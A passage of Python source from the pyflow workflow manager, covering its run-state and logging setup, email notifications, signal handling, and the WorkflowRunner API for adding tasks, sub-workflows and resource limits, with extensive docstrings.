filehandles) self.param.dataDir = os.path.abspath(self.param.dataDir) self.param.dataDir = os.path.join(self.param.dataDir, "pyflow.data") logDir = os.path.join(self.param.dataDir, "logs") ensureDir(logDir) self.flowLogFile = os.path.join(logDir, "pyflow_log.txt") self.flowLogFp = open(self.flowLogFile, "a") # run remaining validation self._validateFixParam(self.param) # initial per-run data self.taskErrors = set() # this set actually contains every task that failed -- tasks contain all of their own error info self.isTaskManagerException = False # create data directory if it does not exist ensureDir(self.param.dataDir) # check whether a process already exists: self.markFile = os.path.join(self.param.dataDir, "active_pyflow_process.txt") if os.path.exists(self.markFile) : # Non-conventional logging situation -- another pyflow process is possibly using this same data directory, so we want # to log to stderr (even if the user has set isQuiet) and not interfere with the other process's log self.flowLogFp = None self.param.isQuiet = False msg = [ "Can't initialize pyflow run because the data directory appears to be in use by another process.", "\tData directory: '%s'" % (self.param.dataDir), "\tIt is possible that a previous process was abruptly interrupted and did not clean up properly. To determine if this is", "\tthe case, please refer to the file '%s'" % (self.markFile), "\tIf this file refers to a non-running process, delete the file and relaunch pyflow,", "\totherwise, specify a new data directory. At the API-level this can be done with the dataDirRoot option." ] self.markFile = None # this keeps pyflow from deleting this file, as it normally would on exit raise DataDirException(msg) else : mfp = open(self.markFile, "w") msg = """ This file provides details of the pyflow instance currently using this data directory. During normal pyflow run termination (due to job completion, error, SIGINT, etc...), this file should be deleted. 
If this file is present it should mean either: (1) the data directory is still in use by a running workflow (2) a sudden job failure occurred that prevented normal run termination The associated pyflow job details are as follows: """ mfp.write(msg + "\n") for line in self.getInfoMsg() : mfp.write(line + "\n") mfp.write("\n") mfp.close() stateDir = os.path.join(self.param.dataDir, "state") ensureDir(stateDir) # setup other instance data: self.runcount += 1 # initialize directories self.wrapperLogDir = os.path.join(logDir, "tmp", "taskWrapperLogs") ensureDir(self.wrapperLogDir) stackDumpLogDir = os.path.join(logDir, "tmp", "stackDumpLog") ensureDir(stackDumpLogDir) # initialize filenames: taskStateFileName = "pyflow_tasks_runstate.txt" taskInfoFileName = "pyflow_tasks_info.txt" self.taskStdoutFile = os.path.join(logDir, "pyflow_tasks_stdout_log.txt") self.taskStderrFile = os.path.join(logDir, "pyflow_tasks_stderr_log.txt") self.taskStateFile = os.path.join(stateDir, taskStateFileName) self.taskInfoFile = os.path.join(stateDir, taskInfoFileName) self.taskDotScriptFile = os.path.join(stateDir, "make_pyflow_task_graph.py") self.stackDumpLogFile = os.path.join(stackDumpLogDir, "pyflow_stack_dump.txt") # empty file: if not self.param.isContinue: fp = open(self.taskInfoFile, "w") fp.write(taskInfoHeader()) fp.close() self._setCustomLogs() # finally write dot task graph creation script: # # this could fail because of script permission settings, buk it is not critical for # workflow completion so we get away with a warning try : writeDotScript(self.taskDotScriptFile, taskInfoFileName, taskStateFileName, self.param.workflowClassName) except OSError: msg = ["Failed to write task graph visualization script to %s" % (self.taskDotScriptFile)] self.flowLog(msg,logState=LogState.WARNING) def resetRun(self) : """ Anything that needs to be cleaned up at the end of a run Right now this just make sure we don't log to the previous run's log file """ self.flowLogFile = None self.param = 
    def getRunid(self) :
        # runid is unique per process instance and per run() invocation:
        return "%s_%s" % (self.pid, self.runcount)

    @lockMethod
    def setTaskError(self, task) :
        self.taskErrors.add(task)

    @lockMethod
    def isTaskError(self) :
        return (len(self.taskErrors) != 0)

    def isTaskSubmissionActive(self) :
        """
        wait() pollers need to know if task submission has been
        shutdown to implement sane behavior.
        """
        return (not self.isTaskError())

    @lockMethod
    def setTaskManagerException(self) :
        self.isTaskManagerException = True

    @lockMethod
    def flowLog(self, msg, linePrefix=None, logState = LogState.INFO) :
        """
        Write a log message to all active log sinks (stderr, main flow log,
        and the optional warning/error replica logs).
        """
        linePrefixOut = "[%s]" % (self.getRunid())
        if linePrefix is not None :
            linePrefixOut += " " + linePrefix
        if (logState == LogState.ERROR) or (logState == LogState.WARNING) :
            linePrefixOut += " [" + LogState.toString(logState) + "]"

        ofpList = []
        # log to stderr when stderr is alive and either no logfile exists yet or isQuiet is off:
        isAddStderr = (self._isStderrAlive and ((self.flowLogFp is None) or (self.param is None) or (not self.param.isQuiet)))
        if isAddStderr:
            ofpList.append(sys.stderr)
        if self.flowLogFp is not None :
            ofpList.append(self.flowLogFp)

        # make a last ditch effort to open the special error logs if these are not available already:
        try :
            self._setCustomLogs()
        except :
            pass

        if (self.warningLogFp is not None) and (logState == LogState.WARNING) :
            ofpList.append(self.warningLogFp)
        if (self.errorLogFp is not None) and (logState == LogState.ERROR) :
            ofpList.append(self.errorLogFp)

        if len(ofpList) == 0 : return
        retval = log(ofpList, msg, linePrefixOut)

        # check if stderr stream failed. If so, turn it off for the remainder of run (assume terminal hup):
        if isAddStderr and (not retval[0]) :
            if self.isHangUp.isSet() :
                self._isStderrAlive = False

    def getInfoMsg(self) :
        """
        return a string array with general stats about this run
        """
        msg = [ "%s\t%s" % ("pyFlowClientWorkflowClass:", self.param.workflowClassName),
                "%s\t%s" % ("pyFlowVersion:", __version__),
                "%s\t%s" % ("pythonVersion:", pythonVersion),
                "%s\t%s" % ("Runid:", self.getRunid()),
                "%s\t%s UTC" % ("RunStartTime:", self.param.logRunStartTime),
                "%s\t%s UTC" % ("NotificationTime:", timeStrNow()),
                "%s\t%s" % ("HostName:", siteConfig.getHostName()),
                "%s\t%s" % ("WorkingDir:", self.cwd),
                "%s\t%s" % ("DataDir:", self.param.dataDir),
                "%s\t'%s'" % ("ProcessCmdLine:", cmdline()) ]
        return msg

    def emailNotification(self, msgList, emailErrorLog=None) :
        #
        # email addy might not be setup yet:
        #
        # if errorLog is specified, then an email send exception will
        # be handled and logged, otherwise the exception will be re-raised
        # down to the caller.
        #
        if self.param is None : return
        if self.param.mailTo is None: return
        if len(self.param.mailTo) == 0 : return

        if not isLocalSmtp() :
            if emailErrorLog :
                msg = ["email notification failed, no local smtp server"]
                emailErrorLog(msg, logState=LogState.WARNING)
            return

        mailTo = sorted(list(self.param.mailTo))
        subject = "pyflow notification from %s run: %s" % (self.param.workflowClassName, self.getRunid())
        msg = msgListToMsg(msgList)
        fullMsgList = ["Message:", '"""', msg, '"""']
        fullMsgList.extend(self.getInfoMsg())

        import smtplib
        try:
            sendEmail(mailTo, siteConfig.mailFrom, subject, fullMsgList)
        except smtplib.SMTPException :
            if emailErrorLog is None : raise
            msg = ["email notification failed"]
            eMsg = lister(getExceptionMsg())
            msg.extend(eMsg)
            emailErrorLog(msg, logState=LogState.WARNING)


class WorkflowRunner(object) :
    """
    This object is designed to be inherited by a class in client code.
This inheriting class can override the L{workflow()<WorkflowRunner.workflow>} method to define the tasks that need to be run and their dependencies. The inheriting class defining a workflow can be executed in client code by calling the WorkflowRunner.run() method. This method provides various run options such as whether to run locally or on sge. """ _maxWorkflowRecursion = 30 """ This limit protects against a runaway forkbomb in case a workflow task recursively adds itself w/o termination: """ def run(self, mode="local", dataDirRoot=".", isContinue=False, isForceContinue=False, nCores=None, memMb=None, isDryRun=False, retryMax=2, retryWait=90, retryWindow=360, retryMode="nonlocal", mailTo=None, updateInterval=60, schedulerArgList=None, isQuiet=False, warningLogFile=None, errorLogFile=None, successMsg=None, startFromTasks=None, ignoreTasksAfter=None, resetTasks=None) : """ Call this method to execute the workflow() method overridden in a child class and specify the resources available for the workflow to run. Task retry behavior: Retry attempts will be made per the arguments below for distributed workflow runs (eg. sge run mode). Note this means that retries will be attempted for tasks with an 'isForceLocal' setting during distributed runs. Task error behavior: When a task error occurs the task manager stops submitting new tasks and allows all currently running tasks to complete. Note that in this case 'task error' means that the task could not be completed after exhausting attempted retries. Workflow exception behavior: Any exceptions thrown from the python code of classes derived from WorkflowRunner will be logged and trigger notification (e.g. email). The exception will not come down to the client's stack. In sub-workflows the exception is handled exactly like a task error (ie. task submission is shut-down and remaining tasks are allowed to complete). 
An exception in the master workflow will lead to workflow termination without waiting for currently running tasks to finish. @return: 0 if all tasks completed successfully and 1 otherwise @param mode: Workflow run mode. Current options are (local|sge) @param dataDirRoot: All workflow data is written to {dataDirRoot}/pyflow.data/ These include workflow/task logs, persistent task state data, and summary run info. Two workflows cannot simultaneously use the same dataDir. @param isContinue: If True, continue workflow from a previous incomplete run based on the workflow data files. You must use the same dataDirRoot as a previous run for this to work. Set to 'Auto' to have the run continue only if the previous dataDir exists. (default: False) @param isForceContinue: Only used if isContinue is not False. Normally when isContinue is run, the commands of completed tasks are checked to ensure they match. When isForceContinue is true, failing this check is reduced from an error to a warning @param nCores: Total number of cores available, or 'unlimited', sge is currently configured for a maximum job count of %s, any value higher than this in sge mode will be reduced to the maximum. (default: 1 for local mode, %s for sge mode) @param memMb: Total memory available (in megabytes), or 'unlimited', Note that this value will be ignored in non-local modes (such as sge), because in this case total memory available is expected to be known by the scheduler for each node in its cluster. (default: %i*nCores for local mode, 'unlimited' for sge mode) @param isDryRun: List the commands to be executed without running them. Note that recursive and dynamic workflows will potentially have to account for the fact that expected files will be missing -- here 'recursive workflow' refers to any workflow which uses the addWorkflowTask() method, and 'dynamic workflow' refers to any workflow which uses the waitForTasks() method. 
        These types of workflows can query this status with
        the isDryRun() to make accommodations. (default: False)

        @param retryMax: Maximum number of task retries

        @param retryWait: Delay (in seconds) before resubmitting task

        @param retryWindow: Maximum time (in seconds) after the first task
                            submission in which retries are allowed. A value of
                            zero or less puts no limit on the time when retries
                            will be attempted. Retries are always allowed (up to
                            retryMax times), for failed make jobs.

        @param retryMode: Modes are 'nonlocal' and 'all'. For 'nonlocal'
                          retries are not attempted in local run mode. For
                          'all' retries are attempted for any run mode. The
                          default mode is 'nonlocal'.

        @param mailTo: An email address or container of email addresses.
                       Notification will be sent to each email address when
                       either (1) the run successfully completes (2) the first
                       task error occurs or (3) an unhandled exception is
                       raised. The intention is to send one status message per
                       run() indicating either success or the reason for
                       failure. This should occur for all cases except a host
                       hardware/power failure. Note that mail comes from
                       '%s' (configurable), which may be classified as
                       junk-mail by your system.

        @param updateInterval: How often (in minutes) should pyflow log a
                               status update message summarizing the run
                               status. Set this to zero or less to turn the
                               update off.

        @param schedulerArgList: A list of arguments can be specified to be
                                 passed on to an external scheduler when
                                 non-local modes are used (e.g. in sge mode
                                 you could pass
                                 schedulerArgList=['-q','work.q'] to put the
                                 whole pyflow job into the sge work.q queue)

        @param isQuiet: Don't write any logging output to stderr (but still
                        write log to pyflow_log.txt)

        @param warningLogFile: Replicate all warning messages to the specified
                               file. Warning messages will still appear in the
                               standard logs, this file will contain a subset
                               of the log messages pertaining to warnings
                               only.

        @param errorLogFile: Replicate all error messages to the specified
                             file. Error messages will still appear in the
                             standard logs, this file will contain a subset
                             of the log messages pertaining to errors only.
                             It should be empty for a successful run.

        @param successMsg: Provide a string containing a custom message which
                           will be prepended to pyflow's standard success
                           notification. This message will appear in the log
                           and any configured notifications (e.g. email). The
                           message may contain linebreaks.

        @param startFromTasks: A task label or container of task labels. Any
                               tasks which are not in this set or descendants
                               of this set will be marked as completed.
        @type startFromTasks: A single string, or set, tuple or list of strings

        @param ignoreTasksAfter: A task label or container of task labels. All
                                 descendants of these task labels will be
                                 ignored.
        @type ignoreTasksAfter: A single string, or set, tuple or list of strings

        @param resetTasks: A task label or container of task labels. These
                           tasks and all of their descendants will be reset to
                           the "waiting" state to be re-run. Note this option
                           will only affect a workflow which has been
                           continued from a previous run. This will not
                           override any nodes altered by the startFromTasks
                           setting in the case that both options are used
                           together.
        @type resetTasks: A single string, or set, tuple or list of strings
        """

        # Setup pyflow signal handlers:
        #
        inHandlers = Bunch(isSet=False)

        class SigTermException(Exception) : pass

        def sigtermHandler(_signum, _frame) :
            raise SigTermException

        def sighupHandler(_signum, _frame) :
            self._warningLog("pyflow recieved hangup signal. pyflow will continue, but this signal may still interrupt running tasks.")
            # tell cdata to turn off any tty writes:
            self._cdata().isHangUp.set()

        def set_pyflow_sig_handlers() :
            import signal
            if not inHandlers.isSet :
                inHandlers.sigterm = signal.getsignal(signal.SIGTERM)
                if not isWindows() :
                    inHandlers.sighup = signal.getsignal(signal.SIGHUP)
                inHandlers.isSet = True
            try:
                signal.signal(signal.SIGTERM, sigtermHandler)
                if not isWindows() :
                    signal.signal(signal.SIGHUP, sighupHandler)
            except ValueError:
                if isMainThread() :
                    raise
                else :
                    self._warningLog("pyflow has not been initialized on main thread, all custom signal handling disabled")

        def unset_pyflow_sig_handlers() :
            import signal
            if not inHandlers.isSet : return
            try :
                signal.signal(signal.SIGTERM, inHandlers.sigterm)
                if not isWindows() :
                    signal.signal(signal.SIGHUP, inHandlers.sighup)
            except ValueError:
                if isMainThread() :
                    raise
                else:
                    pass

        # if return value is somehow not set after this then something bad happened, so init to 1:
        retval = 1
        try:
            set_pyflow_sig_handlers()

            def exceptionMessaging(prefixMsg=None) :
                msg = lister(prefixMsg)
                eMsg = lister(getExceptionMsg())
                msg.extend(eMsg)
                self._notify(msg, logState=LogState.ERROR)

            try:
                self.runStartTimeStamp = time.time()
                self.updateInterval = int(updateInterval)
                # a container to haul all the run() options around in:
                param = Bunch(mode=mode, dataDir=dataDirRoot,
                              isContinue=isContinue, isForceContinue=isForceContinue,
                              nCores=nCores, memMb=memMb,
                              isDryRun=isDryRun,
                              retryMax=retryMax, retryWait=retryWait,
                              retryWindow=retryWindow, retryMode=retryMode,
                              mailTo=mailTo,
                              logRunStartTime=timeStampToTimeStr(self.runStartTimeStamp),
                              workflowClassName=self._whoami(),
                              schedulerArgList=schedulerArgList,
                              isQuiet=isQuiet,
                              warningLogFile=warningLogFile,
                              errorLogFile=errorLogFile,
                              successMsg=successMsg,
                              startFromTasks=setzer(startFromTasks),
                              ignoreTasksAfter=setzer(ignoreTasksAfter),
                              resetTasks=setzer(resetTasks))
                retval = self._runWorkflow(param)

            except SigTermException:
                msg = "Received termination signal, shutting down running tasks..."
                self._killWorkflow(msg)
            except KeyboardInterrupt:
                msg = "Keyboard Interrupt, shutting down running tasks..."
                self._killWorkflow(msg)
            except DataDirException as e:
                # Special exception for when pyflow directory can't be initialized.
                # A killWorkflow is not needed for this case, because no workflow
                # could be started.
                self._notify(e.msg, logState=LogState.ERROR)
            except:
                # For unhandled/unknown exceptions, catch here to write some supplemental
                # data (thread name, etc.) before releasing the exception down the stack
                exceptionMessaging()
                raise

        finally:
            # last set: disconnect the workflow log:
            self._cdata().resetRun()
            unset_pyflow_sig_handlers()

        return retval

    # configurable elements of docstring
    run.__doc__ = run.__doc__ % (siteConfig.maxSGEJobs,
                                 RunMode.data["sge"].defaultCores,
                                 siteConfig.defaultHostMemMbPerCore,
                                 siteConfig.mailFrom)


    # protected methods which can be called within the workflow method:

    def addTask(self, label, command=None, cwd=None, env=None, nCores=1,
                memMb=siteConfig.defaultTaskMemMb, dependencies=None,
                priority=0, isForceLocal=False, isCommandMakePath=False,
                isTaskStable=True, mutex=None,
                retryMax=None, retryWait=None, retryWindow=None, retryMode=None) :
        """
        Add task to workflow, including resource requirements and
        specification of dependencies. Dependency tasks must already exist in
        the workflow.

        @return: The 'label' argument is returned without modification.

        @param label: A string used to identify each task. The label must be
                      composed of only ascii letters, digits, underscores and
                      dashes (ie. /[A-Za-z0-9_-]+/). The label must also be
                      unique within the workflow, and non-empty.

        @param command: The task command. Commands can be: (1) a shell string
                        (2) an iterable container of strings (argument list)
                        (3) None. In all cases strings must not contain
                        newline characters. A single string is typically used
                        for commands that require shell features (such as
                        pipes), an argument list can be used for any other
                        commands, this is often a useful way to simplify
                        quoting issues or to submit extremely long commands.
                        The default command (None), can be used to create a
                        'checkpoint', ie. a task which does not run anything,
                        but provides a label associated with the completion
                        of a set of dependencies.

        @param cwd: Specify current working directory to use for command
                    execution. Note that if submitting the command as an
                    argument list (as opposed to a shell string) the
                    executable (arg[0]) is searched for before changing the
                    working directory, so you cannot specify the executable
                    relative to the cwd setting. If submitting a shell string
                    command this restriction does not apply.

        @param env: A map of environment variables for this task, for example
                    'env={"PATH": "/usr/bin"}'. When env is set to None (the
                    default) the environment of the pyflow client process is
                    used.

        @param nCores: Number of cpu threads required

        @param memMb: Amount of memory required (in megabytes)

        @param dependencies: A task label or container of task labels
                             specifying all dependent tasks. Dependent tasks
                             must already exist in the workflow.
        @type dependencies: A single string, or set, tuple or list of strings

        @param priority: Among all tasks which are eligible to run at the
                         same time, launch tasks with higher priority first.
                         this value can be set from[-100,100]. Note that this
                         will strongly control the order of task launch on a
                         local run, but will only control task submission
                         order to a secondary scheduler (like sge). All jobs
                         with the same priority are already submitted in
                         order from highest to lowest nCores requested, so
                         there is no need to set priorities to replicate this
                         behavior. The taskManager can start executing tasks
                         as soon as each addTask() method is called, so
                         lower-priority tasks may be launched first if they
                         are specified first in the workflow.

        @param isForceLocal: Force this task to run locally when a
                             distributed task mode is used. This can be used
                             to launch very small jobs outside of the sge
                             queue. Note that 'isForceLocal' jobs launched
                             during a non-local task mode are not subject to
                             resource management, so it is important that
                             these represent small jobs. Tasks which delete,
                             move or touch a small number of files are ideal
                             for this setting.

        @param isCommandMakePath: If true, command is assumed to be a path
                                  containing a makefile. It will be run using
                                  make/qmake according to the run's mode and
                                  the task's isForceLocal setting

        @param isTaskStable: If false, indicates that the task command and/or
                             dependencies may change if the run is
                             interrupted and restarted. A command marked as
                             unstable will not be checked to make sure it
                             matches its previous definition during run
                             continuation. Unstable examples: command
                             contains a date/time, or lists a set of files
                             which are deleted at some point in the workflow,
                             etc.

        @param mutex: Provide an optional id associated with a pyflow task
                      mutex. For all tasks with the same mutex id, no more
                      than one will be run at once. Id name must follow task
                      id restrictions. Mutex ids are global across all
                      recursively invoked workflows. Example use case: This
                      feature has been added as a simpler alternative to file
                      locking, to ensure sequential, but not ordered, access
                      to a file.

        @param retryMax: The number of times this task will be retried after
                         failing. If defined, this overrides the workflow
                         retryMax value.

        @param retryWait: The number of seconds to wait before relaunching a
                          failed task. If defined, this overrides the
                          workflow retryWait value.

        @param retryWindow: The number of seconds after job submission in
                            which retries will be attempted for non-make
                            jobs. A value of zero or less causes retries to
                            be attempted anytime after job submission. If
                            defined, this overrides the workflow retryWindow
                            value.

        @param retryMode: Modes are 'nonlocal' and 'all'. For 'nonlocal'
                          retries are not attempted in local run mode. For
                          'all' retries are attempted for any run mode. If
                          defined, this overrides the workflow retryMode
                          value.
        """
        self._requireInWorkflow()

        #### Canceled plans to add deferred dependencies:
        # # deferredDependencies -- A container of labels specifying dependent
        # #                         tasks which have not yet been added to the
        # #                         workflow. In this case the added task will
        # #                         wait for the dependency to be defined *and*
        # #                         complete. Avoid these in favor of regular
        # #                         dependencies if possible.

        # sanitize bools:
        isForceLocal = argToBool(isForceLocal)
        isCommandMakePath = argToBool(isCommandMakePath)

        # sanitize ints:
        nCores = int(nCores)
        memMb = int(memMb)
        priority = int(priority)
        if (priority > 100) or (priority < -100) :
            raise Exception("priority must be an integer in the range [-100,100]")

        # sanity check label:
        WorkflowRunner._checkTaskLabel(label)

        fullLabel = namespaceJoin(self._getNamespace(), label)

        # verify/sanitize command:
        cmd = Command(command, cwd, env)

        # deal with command/resource relationship:
        if cmd.cmd is None :
            nCores = 0
            memMb = 0
        else:
            if nCores <= 0 :
                raise Exception("Unexpected core requirement for task: '%s' nCores: %i" % (fullLabel, nCores))
            if memMb <= 0:
                raise Exception("Unexpected memory requirement for task: '%s' memory: %i (megabytes)" % (fullLabel, memMb))

        if (self._cdata().param.nCores != "unlimited") and (nCores > self._cdata().param.nCores) :
            raise Exception("Task core requirement exceeds full available resources")

        if (self._cdata().param.memMb != "unlimited") and (memMb > self._cdata().param.memMb) :
            raise Exception("Task memory requirement exceeds full available resources")

        # check that make path commands point to a directory:
        #
        if isCommandMakePath :
            if cmd.type != "str" :
                raise Exception("isCommandMakePath is set, but no path is provided in task: '%s'" % (fullLabel))
            cmd.cmd = os.path.abspath(cmd.cmd)

        # sanitize mutex option
        if mutex is not None :
            WorkflowRunner._checkTaskLabel(mutex)

        task_retry = self._cdata().param.retry.getTaskCopy(retryMax, retryWait, retryWindow, retryMode)

        # private _addTaskCore gets hijacked in recursive workflow submission:
        #
        payload = CmdPayload(fullLabel, cmd, nCores, memMb, priority, isForceLocal,
                             isCommandMakePath, isTaskStable, mutex, task_retry)
        self._addTaskCore(self._getNamespace(), label, payload, dependencies)
        return label


    def addWorkflowTask(self, label, workflowRunnerInstance, dependencies=None, isEphemeral=False) :
        """
        Add another WorkflowRunner instance as a task to this workflow. The
        added Workflow's workflow() method will be called once the
        dependencies specified in this call have completed. Once started, all
        of the submitted workflow's method calls (like addTask) will be
        placed into the enclosing workflow instance and bound by the run
        parameters of the enclosing workflow. This task will be marked
        complete once the submitted workflow's workflow() method has
        finished, and any tasks it initiated have completed.

        Note that all workflow tasks will have their own tasks namespaced
        with the workflow task label. This namespace is recursive in the case
        that you add workflow tasks which add their own workflow tasks, etc.

        Note that the submitted workflow instance will be deep copied before
        being altered in any way.

        @return: The 'label' argument is returned without modification.

        @param label: A string used to identify each task. The label must be
                      composed of only ascii letters, digits, underscores and
                      dashes (ie. /[A-Za-z0-9_-]+/). The label must also be
                      unique within the workflow, and non-empty.

        @param workflowRunnerInstance: A L{WorkflowRunner} instance.

        @param dependencies: A label string or container of labels specifying
                             all dependent tasks. Dependent tasks must
                             already exist in the workflow.
        @type dependencies: A single string, or set, tuple or list of strings

        @param isEphemeral: If true, the workflow will be rerun under certain
                            conditions when an interrupt/resume cycle occurs,
                            even if it already successfully completed. This
                            will only occur if (1) no downstream dependencies
                            have already completed and (2) the parent
                            workflow is not complete. (default: False)
        """
        self._requireInWorkflow()

        # sanity check label:
        WorkflowRunner._checkTaskLabel(label)

        import inspect

        # copy and 'hijack' the workflow:
        workflowCopy = copy.deepcopy(workflowRunnerInstance)

        # hijack! -- take all public methods at the WorkflowRunner level
        # (except workflow()), and insert the self copy:
        publicExclude = ["workflow", "addTask", "addWorkflowTask", "waitForTasks",
                         "isTaskComplete", "isTaskDone", "cancelTaskTree"]
        for (n, _v) in inspect.getmembers(WorkflowRunner, predicate=inspect.ismethod) :
            if n[0] == "_" : continue  # skip private/special methods
            if n in publicExclude : continue
            setattr(workflowCopy, n, getattr(self, n))

        privateInclude = ["_cdata", "_addTaskCore", "_waitForTasksCore",
                          "_isTaskCompleteCore", "_setRunning", "_getRunning",
                          "_cancelTaskTreeCore"]
        for n in privateInclude :
            setattr(workflowCopy, n, getattr(self, n))

        # final step: disable the run() function to be extra safe...
        workflowCopy.run = None

        # set the task namespace:
        workflowCopy._appendNamespace(self._getNamespaceList())
        workflowCopy._appendNamespace(label)

        # add workflow task to the task-dag, and launch a new taskrunner thread
        # if one isn't already running:
        payload = WorkflowPayload(workflowCopy, isTaskEphemeral=isEphemeral)
        self._addTaskCore(self._getNamespace(), label, payload, dependencies)
        return label


    def waitForTasks(self, labels=None) :
        """
        Wait for a list of tasks to complete.

        @return: In case of an error in a task being waited for, or in one of
                 these task's dependencies, the function returns 1. Else
                 return 0.

        @param labels: Container of task labels to wait for. If an empty
                       container is given or no list is provided then wait
                       for all outstanding tasks to complete.
        @type labels: A single string, or set, tuple or list of strings
        """
        self._requireInWorkflow()

        return self._waitForTasksCore(self._getNamespace(), labels)


    def isTaskComplete(self, taskLabel) :
        """
        Query if a specific task is in the workflow and completed without
        error.

        This can assist workflows with providing stable interrupt/resume
        behavior.

        @param taskLabel: A task string

        @return: Completion status of task
        """
        result = self._isTaskCompleteCore(self._getNamespace(), taskLabel)
        # Complete = (Done and not Error)
        return (result[0] and not result[1])


    def isTaskDone(self, taskLabel) :
        """
        Query if a specific task is in the workflow and is done, with or
        without error

        This can assist workflows with providing stable interrupt/resume
        behavior.

        @param taskLabel: A task string

        @return: A boolean tuple specifying (task is done, task finished with error)
        """
        return self._isTaskCompleteCore(self._getNamespace(), taskLabel)


    def cancelTaskTree(self, taskLabel) :
        """
        Cancel the given task and all of its dependencies.

        A canceled task will not be stopped if it is already running (this is
        planned for the future), but will be unqueued if it is waiting, and
        put into the waiting/ignored state unless it has already completed.
        Canceled tasks will not be treated as errors.
        """
        self._cancelTaskTreeCore(self._getNamespace(), taskLabel)


    def getRunMode(self) :
        """
        Get the current run mode

        This can be used to access the current run mode from within the
        workflow function. Although the runmode should be transparent to
        client code, this is occasionally needed to hack workarounds.

        @return: Current run mode
        """
        self._requireInWorkflow()

        return self._cdata().param.mode


    def getNCores(self) :
        """
        Get the current run core limit

        This function can be used to access the current run's core limit
        from within the workflow function. This can be useful to eg. limit
        the number of cores requested by a single task.

        @return: Total cores available to this workflow run
        @rtype: Integer value or 'unlimited'
        """
        self._requireInWorkflow()

        return self._cdata().param.nCores


    def limitNCores(self, nCores) :
        """
        Takes a task nCores argument and reduces it to the maximum value
        allowed for the current run.

        @param nCores: Proposed core requirement

        @return: Min(nCores,Total cores available to this workflow run)
        """
        self._requireInWorkflow()

        nCores = int(nCores)
        runNCores = self._cdata().param.nCores
        if runNCores == "unlimited" : return nCores
        return min(nCores, runNCores)


    def getMemMb(self) :
        """
        Get the current run's total memory limit (in megabytes)

        @return: Memory limit in megabytes
        @rtype: Integer value or 'unlimited'
        """
        self._requireInWorkflow()

        return self._cdata().param.memMb


    def limitMemMb(self, memMb) :
        """
        Takes a task memMb argument and reduces it to the maximum value
        allowed for the current run.

        @param memMb: Proposed task memory requirement in megabytes

        @return: Min(memMb,Total memory available to this workflow run)
        """
        self._requireInWorkflow()

        memMb = int(memMb)
        runMemMb = self._cdata().param.memMb
        if runMemMb == "unlimited" : return memMb
        return min(memMb, runMemMb)


    def isDryRun(self) :
        """
        Get isDryRun flag value.

        When the dryrun flag is set, no commands are actually run. Querying
        this flag allows dynamic workflows to correct for dry run behaviors,
        such as tasks which do not produce expected files.

        @return: DryRun status flag
        """
        self._requireInWorkflow()

        return self._cdata().param.isDryRun


    def isWorkflowStopping(self) :
        """
        Return true if the workflow is in the process of stopping

        Usually the workflow is stopped due to a task error. The goal of this
        behavior is to allow currently running tasks to complete but not
        launch any new tasks. It is not essential that a workflow check this
        method and respond by stopping workflow execution unless it
        implements some type of potentially infinite loop dependent on task
        outcome.
        """
        return (not self._cdata().isTaskSubmissionActive())


    @staticmethod
    def runModeDefaultCores(mode) :
        """
        Get the default core limit for run mode (local,sge,..)

        @param mode: run mode, as specified in L{the run() method<WorkflowRunner.run>}

        @return: Default maximum number of cores for mode

        @rtype: Either 'unlimited', or a string representation of the integer limit
        """
        return str(RunMode.data[mode].defaultCores)


    def flowLog(self, msg, logState = LogState.INFO) :
        """
        Send a message to the WorkflowRunner's log.

        @param msg: Log message
        @type msg: A string or an array of strings. String arrays will be
                   separated by newlines in the log.
        @param logState: Message severity, defaults to INFO.
        @type logState: A value in pyflow.LogState.{INFO,WARNING,ERROR}
        """
        self._requireInWorkflow()

        linePrefixOut = "[%s]" % (self._cdata().param.workflowClassName)
        self._cdata().flowLog(msg, linePrefix=linePrefixOut, logState=logState)


    # Protected methods for client derived-class override:

    def workflow(self) :
        """
        Workflow definition defined in child class

        This method should be overridden in the class derived from
        L{WorkflowRunner} to specify the actual workflow logic. Client code
        should not call this method directly.
        """
        pass


    # private methods:

    # special workflowRunner Exception used to terminate workflow() function
    # if a ctrl-c is issued
    class _AbortWorkflowException(Exception) : pass


    def _flowLog(self, msg, logState) :
        linePrefixOut = "[WorkflowRunner]"
        self._cdata().flowLog(msg, linePrefix=linePrefixOut, logState=logState)

    def _infoLog(self, msg) :
        self._flowLog(msg, logState=LogState.INFO)

    def _warningLog(self, msg) :
        self._flowLog(msg, logState=LogState.WARNING)

    def _errorLog(self, msg) :
        self._flowLog(msg, logState=LogState.ERROR)

    def _whoami(self) :
        # returns name of *derived* class
        return self.__class__.__name__

    def _getNamespaceList(self) :
        try:
            return self._namespaceList
        except AttributeError:
            self._namespaceList = []
            return self._namespaceList

    def _getNamespace(self) :
        return namespaceSep.join(self._getNamespaceList())

    def _appendNamespace(self, names) :
        names = lister(names)
        for name in names :
            # check against runaway recursion:
            if len(self._getNamespaceList()) >= WorkflowRunner._maxWorkflowRecursion :
                raise Exception("Recursive workflow invocation depth exceeds maximum allowed depth of %i" % (WorkflowRunner._maxWorkflowRecursion))
            WorkflowRunner._checkTaskLabel(name)
            self._getNamespaceList().append(name)


    # flag used to request the termination of all task submission:
    #
    _allStop = threading.Event()

    @staticmethod
    def _stopAllWorkflows() :
        # request all workflows stop task submission:
        WorkflowRunner._allStop.set()

    @staticmethod
    def _isWorkflowStopped() :
        # check whether a global signal has been given to stop all workflow submission
        # this should only be true when a ctrl-C or similar event has occurred.
        return WorkflowRunner._allStop.isSet()


    def _addTaskCore(self, namespace, label, payload, dependencies) :
        # private core addTask routine for hijacking
        # fromWorkflow is the workflow instance used to launch the task
        #
        # add workflow task to the task-dag, and launch a new taskrunner thread
        # if one isn't already running:
        if self._isWorkflowStopped() :
            raise WorkflowRunner._AbortWorkflowException

        self._infoLog("Adding %s '%s' to %s" % (payload.desc(), namespaceJoin(namespace, label), namespaceLabel(namespace)))

        # add task to the task-dag, and launch a new taskrunner thread
        # if one isn't already running:
        dependencies = setzer(dependencies)
        self._tdag.addTask(namespace, label, payload, dependencies)
        self._startTaskManager()


    def _getWaitStatus(self, namespace, labels, status) :
        # update and return two values:
        #  (1) isAllTaskDone -- are all tasks done (ie. error or complete state
        #  (2) retval -- this is set to one if any tasks have errors
        #
        def updateStatusFromTask(task, status) :
            if not task.isDone() :
                status.isAllTaskDone = False
            elif not task.isComplete() :
                status.retval = 1
            if status.retval == 0 and (not self._cdata().isTaskSubmissionActive()) :
                status.retval = 1
            if status.retval == 0 and task.isDead() :
                status.retval = 1

        if len(labels) == 0 :
            if namespace == "" :
                if self._tdag.isRunExhausted() or (not self._tman.is_alive()) :
                    if not self._tdag.isRunComplete() :
                        status.retval = 1
                else:
                    status.isAllTaskDone = False
            else :
